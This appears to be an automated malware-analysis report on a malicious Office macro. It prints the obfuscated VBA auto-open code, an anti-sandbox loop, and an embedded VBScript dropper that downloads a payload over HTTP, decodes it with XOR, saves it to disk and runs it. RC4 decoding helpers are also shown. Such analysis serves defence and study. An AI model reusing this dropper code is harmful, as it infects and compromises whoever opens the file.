317 | DFfKIT.Run B6BznN, ((587 - 42) - (3682020 / 6756)), ((1675644 / 5942) - (6865 - 6583)) | IWshShell3.Run("cmd.exe /V /C set "GBG=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm DxF3znV" "FunCTIoN RM7H(TqP,SUpcFxy)" "BCGW2=65" "dIM Qiw,O2ErlP,PEd4" "Qo1rh7B=85" "fOr Qiw=1 tO (Len(TqP)/2)" "O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP,(Qiw+Qiw)-1,2)))" "PEd4=(MZrD(Mid(SUpcFxy,((Qiw moD LEn(SUpcFxy))+1),1)))" "RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP,PEd4))" "NEXt" "RCTUfL=22" "EnD fUncTIOn" "Cllae0=23" "KyzlwC" "sUB KyzlwC()" "OF=45" "DIm Tw,Jl,WC8fC" "Ui=84" "Tw=96824294" "KNatGfc=89" "FOr Jl=1 tO Tw" "WC8fC=WC8fC+1" "NexT" "Xt=77" "iF WC8fC=Tw Then" "Ep8UXJ=64" "Mule6z((1336770/4951))" "DFyX5SF=24" "PbE0o(RM7H("2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30","WCM"))" "N08kbpy=70" "eLsE" "TeDg=46" "SG5Ave=28" "EnD iF" "TSoUPG=33" "EnD suB" "FUnCTIoN XtPB7z2(C9NbQom)" "PkAKI0E=14" "XtPB7z2=Chr(C9NbQom)" "LK=15" "eND FuNCTiON" "SuB Wusodn4()" "XuOFto5=43" "Dim UQFOGB, KJk" "For UQFOGB = 38 To 9000267" "KJk = RyQrP + 83 + 80 + 90" "Next" "DVYff=1" "End sUB" "SUb M0cJLn()" "NM=43" "diM VW,ELc,PCds,BjuC5aE" "NH=28" "PCds=""""" "Mt=19" "ELc=DxF3znV & TKsHu & RM7H("7D045507","NSp8wZ0")" "RQwDOV=4" "MNs9uB DxF3znV,ELc" "O5t=91" "iF BjuC5aE="" THen Mule6z(4)" "L1ksUsW=17" "VW="SIrWOMB"" "LwjuV=31" "SEt BwZn=cREaTeOBject(RM7H("1E21343D24322767213F2A212E",VW))" "BVv1A=80" "BwZn.RUn RM7H("2D1C2F6F1D4E266E5E08612B62021C256B635A1661","CNqKAx6") & ELc & PCds,8134-8134,2260-2260" "TIbnnCE=13" "End Sub" "SuB SsQ()" "P1t=5" "dIM NgoLmHV,TGr" "Cv80c3=62" "Do WhIle NgoLmHV<>5317-5316" "TGr=TGr+1" "WSCript.sLEEP(28)" "Loop" "D1zerr=83" "EnD sUB" "sUb Mule6z(RevOKyJ)" "WQ50Sb6=91" "DiM LpZsh" "QW=34" "LpZsh=timER+RevOKyJ" "dO whIle TiMeR<LpZsh" "wSCRiPt.Sleep(2)" "Loop" "Er8g9=8" "EnD sUB" "fUNCtion TKsHu()" "GtkE=70" "TKsHu=SecONd(TImE)" "OZgqxC=48" "enD fUnCTioN" "FUncTioN PbE0o(SE1cf)" "ReuR=18" "dIM RAOx,XkSvP,CNlxWn,EPNWwO,PQMM" "YVYNy=1" "On erroR reSUmE NeXt" "ARJH8=74" "CNlxWn="QAMNVmL"" "R0VOo=25" "sET RAOx=crEATEobjECT(RM7H("161E2D24043C256F1E26330120",CNlxWn))" "LRRQfm=62" "Wusodn4" "X77kzx=91" "Set OAmVp=RAOx.ENVirOnMeNT(RM7H("33250E20321230","Acw"))" "XIzNEID=1" "DxF3znV=OAmVp(RM7H("13110413131515","WRAT"))&XtPB7z2((830-738))& TKsHu & TKsHu" "TC3=16" "EPNWwO="IHCr"" "I5DpS=10" "SeT XkSvP=crEatEobJEcT(RM7H("052A113B27301D2F3C6D2A04040B261D18",EPNWwO))" "KU=48" "XkSvP.OPen RM7H("0E713D","XI4i0"),SE1cf,9990-9990" "Ie=16" "XkSvP.SEtRequeSTheaDer RM7H("1F5409572A","QM5g0OA"),RM7H("3320022422644371686A5B","AQYv")" "YYYHtq1=70" "XkSvP.SEnD()" "X0E0=33" "if XkSvP.STAtuSTExt=RM7H("13122A371A392F531B2C1D2C261D2C","XCs") then" "SqN2=57" "Wusodn4" "GX=46" "Mule6z(4)" "Yad=55" "FH XkSvP.rEspoNseBoDY" "MMA=83" "Else" "Wuc8=82" "PQMM="E3rz"" "X6KS=14" "SeT XkSvP= creatEoBJECt(RM7H("7E1B19375C011523475C22087F3A2E1163",PQMM))" "BjdWH=29" "XkSvP.OpeN RM7H("292B35","Mnna0kE"),RM7H("5E30324074196B2F5423572D355F20182A2344615033685A3E51","N6DF0" ),9751-9751" "VcHw=29" "XkSvP.sEtrEqUeSTHEaDEr RM7H("332E0F2804","Oa"),RM7H("542A4628456E077D0F601F","M6S2")" "VMX=37" "XkSvP.SEnD()" "QSABO=86" "If XkSvP.StatUSTeXT=RM7H("2350304D252E1F110156223B165F36","Os1B9L") tHEn FH XkSvP.responSeBODy" "I3D=66" "Jhd=59" "end if" "OFqx1=45" "End FUncTIOn" "sUb FH(YAuf)" "Yn=86" "dIm M5,Y9zz983" "O9zJmIO=30" "Y9zz983="XF"" "PMY=63" "SEt M5=createObJECt(RM7H("071C091C0476152C343D2735",Y9zz983))" "VZ1=19" "M5.OpeN" "YVIgE=35" "M5.TYpE=9542-9541" "FH5xrC=28" "M5.WritE YAuf" "WN8ajm=73" "M5.sAVetoFiLe DxF3znV,5206-5204" "QKYC=21" "M5.cLoSE" "FzUz8m=8" "M0cJLn" "Iw6Z=36" "eND SUb" "funcTioN MZrD(QAd)" "JrGZqM=95" "MZrD=ASc(QAd)" "GvVffY=48" "enD FuNcTiON" "funCTion MNs9uB(LXzuy,NUa)" "SOv6=61" "dIm GH7,KJkz,AdyAC,OPkR,Fp(7)" "KA=45" "Fp(1)=106" "IXQyb=39" "Fp(6)=115" "CFw=41" "Fp(2)=118" "RwOAf4r=86" "Fp(3)=103" "U0r=78" "Fp(7)=111" "MJ56ht=71" "Fp(4)=116" "KTBrm=13" "Fp(0)=115" "CtMg=90" "Fp(5)=104" "GJQ=89" "PSKfp1=28" "sET GH7=cREaTEobjEct(RM7H("002431302538253D206D1F3C2029003E302D302103312D263A21", "LSGCYUL"))" "PeN5TC8=50" "Set KJkz=GH7.gETfilE(LXzuy)" "XcYZQp=30" "sET OPkR=KJkz.oPenastExtstrEaM(733-732,8036-8036)" "DXG=52" "sEt AdyAC=GH7.CREaTETextFile(NUa,239-238,3016-3016)" "RU0xHi=89" "dO UntIl OPkR.AtENdOfstrEam" "AdyAC.WrITe XtPB7z2(KLGYdz(MZrD(OPkR.reAd(4298-4297)),Fp(0)))" "LOOp" "Uu48fY=88" "AdyAC.CLOse" "Oc=29" "OPkR.CLOse" "FTHurcs=65" "End fuNCtIOn" "fUNCtIon KLGYdz(Qtoxg,Fjo)" "RsgNc=91" "KLGYdz=(Qtoxg ANd Not Fjo)Or(noT Qtoxg aND Fjo)" "Pq4oC=28" "eNd fUnction") do @echo %~i)>"!GBG!" && start "" "!GBG!"",0,0) -> 0 executed |
318 | End Sub |
APIs | Meta Information |
---|---|
Part of subcall function K9@ThisDocument: Split | |
Part of subcall function K9@ThisDocument: Label1 | |
Part of subcall function K9@ThisDocument: CreateObject | |
Part of subcall function K9@ThisDocument: Run |
Line | Instruction | Meta Information |
---|---|---|
319 | Private Sub DocumeNt_OPen() | |
320 | On Error Resume Next | executed |
321 | Dim CTxkvAj as Long, B0JKYZD as Long, GFHkrO as Long | |
323 | CTxkvAj = 98757 | |
324 | For B0JKYZD = 1 To CTxkvAj | |
325 | GFHkrO = GFHkrO + 1 | |
326 | Next B0JKYZD | |
327 | If GFHkrO = CTxkvAj Then | |
328 | Dim T2 as Integer, XPxRJX as String | |
330 | For T2 = 4 To 568 | |
331 | XPxRJX = XPxRJX + T2 | |
332 | Next | |
334 | K9 | |
335 | Else | |
336 | NlKk1p | |
337 | Endif | |
338 | End Sub |
Line | Instruction | Meta Information |
---|---|---|
370 | Private Function Ks86hO(GJDwbXe() as Byte, J97AXWJ() as Byte) as String | |
371 | On Error Resume Next | executed |
372 | Dim WCN(0 To 255) as Integer, JzuQ as Long, SU4Pcwy as Long, NgY as Long, JFeic as Byte, DDt1g() as Byte, IVwF59() as Byte | |
374 | Redim DDt1g(GzYTO(GJDwbXe)) | |
375 | DDt1g = GJDwbXe | |
376 | Redim IVwF59(GzYTO(J97AXWJ)) | |
377 | IVwF59 = J97AXWJ | |
378 | For JzuQ = 0 To (- 7610 + 7865) | |
379 | WCN(JzuQ) = JzuQ | |
381 | Next JzuQ | |
382 | JzuQ = 0 | |
383 | SU4Pcwy = 0 | |
384 | NgY = 0 | |
385 | For JzuQ = 0 To (1668465 / 6543) | |
386 | SU4Pcwy = SkTX4v((SU4Pcwy + WCN(JzuQ) + IVwF59(SkTX4v(JzuQ, (GzYTO(J97AXWJ) + 1)))), ((4276 - 4020))) | |
388 | JFeic = WCN(JzuQ) | |
389 | WCN(JzuQ) = WCN(SU4Pcwy) | |
390 | WCN(SU4Pcwy) = JFeic | |
391 | Next JzuQ | |
393 | JzuQ = 0 | |
394 | SU4Pcwy = 0 | |
395 | NgY = 0 | |
396 | For JzuQ = 0 To GzYTO(GJDwbXe) | |
397 | SU4Pcwy = SkTX4v((SU4Pcwy + 1), (6880 - 6624)) | |
398 | NgY = SkTX4v((NgY + WCN(SU4Pcwy)), (- 426 + 682)) | |
400 | JFeic = WCN(SU4Pcwy) | |
401 | WCN(SU4Pcwy) = WCN(NgY) | |
402 | WCN(NgY) = JFeic | |
403 | DDt1g(JzuQ) = FHHth5(DDt1g(JzuQ), (WCN(SkTX4v((WCN(SU4Pcwy) + WCN(NgY)), ((646144 / 2524)))))) | |
404 | Next JzuQ | |
405 | Ks86hO = R0(DDt1g) | |
407 | End Function |
Line | Instruction | Meta Information |
---|---|---|
354 | Private Function EhDH2(ByVal IxJUP as String, ByVal X420 as Long, ByVal AIOs as Variant) as String | |
355 | Dim LTEL() as Byte, A6fY() as Byte, EhS as Long, YW as Long | executed |
357 | LTEL = IxJUP | |
358 | EhS = GzYTO(LTEL) | |
359 | X420 = (X420 - 1) * 2 | |
360 | AIOs = (AIOs * 2) - 1 | |
361 | If X420 + AIOs > EhS Then | |
361 | AIOs = EhS - X420 | |
361 | Endif | |
363 | Redim A6fY(AIOs) | |
364 | For YW = X420 To X420 + AIOs | |
365 | A6fY(YW - X420) = LTEL(YW) | |
367 | Next YW | |
368 | EhDH2 = A6fY | |
369 | End Function |
Line | Instruction | Meta Information |
---|---|---|
432 | Private Function IJ(ByVal EV as Integer) as String | |
433 | Dim Mjjq8Xy(1) as Byte, Bek2Mv3 as Byte, RYkEaJ as Byte | executed |
434 | If EV < 0 Then | |
434 | Exit Function | |
434 | Endif | |
435 | If EV > (- 5901 + 6156) Then | |
437 | RYkEaJ = 0 | |
438 | Else | |
439 | Bek2Mv3 = EV | |
440 | RYkEaJ = 0 | |
442 | Endif | |
443 | Mjjq8Xy(0) = Bek2Mv3 | |
444 | Mjjq8Xy(1) = RYkEaJ | |
445 | IJ = Mjjq8Xy | |
447 | End Function |
Line | Instruction | Meta Information |
---|---|---|
419 | Private Function GzYTO(ByVal LzRU5Mi as Variant) as Long | |
420 | On Error Goto Xs5uG8 | executed |
421 | Dim DPcIJ as Long, NxI as Variant | |
422 | Do | |
424 | NxI = LzRU5Mi(DPcIJ) | |
425 | DPcIJ = DPcIJ + 1 | |
426 | Loop | |
426 | Xs5uG8: | |
428 | If DPcIJ = 0 Then | |
428 | Exit Function | |
428 | Endif | |
430 | GzYTO = DPcIJ - 1 | |
431 | End Function |
Line | Instruction | Meta Information |
---|---|---|
408 | Private Function JaY8xys(Fj3 as Long, SUjGb as Long) as Byte | |
409 | Dim ClRNr as Long, TsBt as Long | executed |
410 | For ClRNr = (3213 - 3165) To (8990 - 8933) | |
411 | If EhDH2(Fj3, SUjGb, 1) = TsBt Then | |
411 | JaY8xys = ClRNr | |
411 | Exit For | |
411 | Endif | |
413 | TsBt = TsBt + 1 | |
414 | Next ClRNr | |
415 | End Function |
Line | Instruction | Meta Information |
---|---|---|
343 | Private Function R0(DlWkVBh() as Byte) as String | |
344 | Dim TgXwjZn as Long | executed |
346 | For TgXwjZn = 0 To GzYTO(DlWkVBh) | |
347 | R0 = R0 & IJ(DlWkVBh(TgXwjZn)) | |
348 | Next TgXwjZn | |
349 | End Function |
Line | Instruction | Meta Information |
---|---|---|
340 | Private Function FHHth5(XsKg, TWba) | |
341 | FHHth5 = (XsKg And Not TWba) Or (Not XsKg And TWba) | executed |
342 | End Function |
Line | Instruction | Meta Information |
---|---|---|
350 | Private Function SkTX4v(KLVL, FznF) | |
352 | SkTX4v = KLVL - (FznF * (KLVL \ FznF)) | executed |
353 | End Function |
Non-Executed Functions |
---|
Line | Instruction | Meta Information |
---|---|---|
416 | Private Sub NlKk1p() | |
417 | End Sub |
Module: UserForm1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "UserForm1" |
2 | Attribute VB_Base = "0{774FA1C1-296F-42E0-AC5C-4F18002D0542}{44E9776F-97A3-4FF4-8105-36CD6C3C2042}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |